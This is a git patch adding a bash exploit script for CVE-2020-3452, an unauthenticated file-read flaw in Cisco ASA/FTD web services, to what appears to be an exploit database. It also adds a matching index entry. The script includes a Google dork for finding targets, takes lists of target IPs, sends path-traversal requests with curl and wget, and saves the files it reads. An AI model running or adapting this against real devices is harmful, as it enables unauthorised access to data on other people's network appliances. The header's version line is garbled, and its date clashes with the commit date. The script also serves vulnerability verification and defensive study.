From d8411b66138d6889b42b49e6375778b557da18be Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Wed, 29 Jul 2020 05:02:05 +0000 Subject: [PATCH] DB: 2020-07-29 1 changes to exploits/shellcodes Cisco Adaptive Security Appliance Software 9.11 - Local File Inclusion --- exploits/hardware/webapps/48722.txt | 96 +++++++++++++++++++++++++++++ files_exploits.csv | 1 + 2 files changed, 97 insertions(+) create mode 100644 exploits/hardware/webapps/48722.txt diff --git a/exploits/hardware/webapps/48722.txt b/exploits/hardware/webapps/48722.txt new file mode 100644 index 000000000..2f67bbcfc --- /dev/null +++ b/exploits/hardware/webapps/48722.txt @@ -0,0 +1,96 @@ +# Exploit Title: Cisco Adaptive Security Appliance Software 9.11 - Local File Inclusion +# Google Dork: inurl:/+CSCOE+/ +# Date: 2020-08-27 +# Exploit Author: 0xmmnbassel +# Vendor Homepage: https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asaftd-ro-path-KJuQhB86 +# Version: Cisco ASA Software >=9.14 except 9.11 Cisco FTD Software >=6.2.2 and 6.2.3,6.3.0,6.4.0,6.50,6.60 +# Vulnerability Type: unauthenticated file read +# CVE: CVE-2020-3452 + + +#!/bin/bash + + +read="%2bCSCOE%2b/portal_inc.lua" + + +helpFunction() +{ + echo "" + echo -e "\t\tCVE-2020-3452" + echo "" + echo "Usage: $0 -l targets.txt -r %2bCSCOE%2b/portal_inc.lua " + echo -e "\t-l for list of IPs in text file" + echo -e "\t-r file to read, default: %2bCSCOE%2b/portal_inc.lua" + echo -e "\t-i for single IP test" + exit 1 +} + +while getopts "l:r:i:" opt +do + case "$opt" in + l ) input="$OPTARG" ;; + r ) read="$OPTARG" ;; + i ) website="$OPTARG" ;; + ? ) helpFunction ;; + esac +done + + + +#if $website is empty or $input is empty +if [ -z "$website" ] && [ -z "$input" ] +then + echo "Some/all of the parameters are empty"; + helpFunction +fi + +#usage + + +if [ -z "$website"]; + then + while IFS= read -r line + do + name=$(echo $line | cut -c9-19) + #echo "testing $line" + filename="$name.txt" + #echo $response + status=$(curl -LI $line"/+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name="$read -o /dev/null -w '%{http_code}\n' -s) + + if [ $status -eq "400" ]; then + echo "$line/+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name=$read doesn't exist!" + else + wget "$line/+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name=$read" -O $name.txt + + if [ -s $filename ]; then + echo "$line/+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name=$read exists, reading $read..." + echo "downloaded!, $line is vulnerable to CVE-2020-3452." + + else + echo "not vulnerable!" + rm -rf $filename + fi + fi + done < "$input" + else + + name=$(echo $website | cut -c9-16) + filename="$name.txt" + + status=$(curl -LI $website"/+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name="$read -o /dev/null -w '%{http_code}\n' -s) + if [ $status -eq "Bad Request" ]; then + echo "$website/+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name=$read doesn't exist!" + else + + echo "$website/+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name=$read exists, reading $read..." + wget "$website/+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name=$read" -O $name.txt + if [ -s $filename ]; then + echo "downloaded!, $website is vulnerable to CVE-2020-3452." + else + echo "not vulnerable!" + rm -rf $filename + fi + fi + +fi \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 0c72d14a4..45595a3dd 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -42964,3 +42964,4 @@ id,file,description,date,author,type,platform,port 48715,exploits/php/webapps/48715.txt,"Virtual Airlines Manager 2.6.2 - Persistent Cross-Site Scripting",2020-07-26,"Peter Blue",webapps,php, 48716,exploits/ruby/webapps/48716.rb,"Rails 5.0.1 - Remote Code Execution",2020-07-26,"Lucas Amorim",webapps,ruby, 48720,exploits/php/webapps/48720.py,"eGroupWare 1.14 - 'spellchecker.php' Remote Command Execution",2020-07-27,"Berk KIRAS",webapps,php, +48722,exploits/hardware/webapps/48722.txt,"Cisco Adaptive Security Appliance Software 9.11 - Local File Inclusion",2020-07-28,0xmmnbassel,webapps,hardware,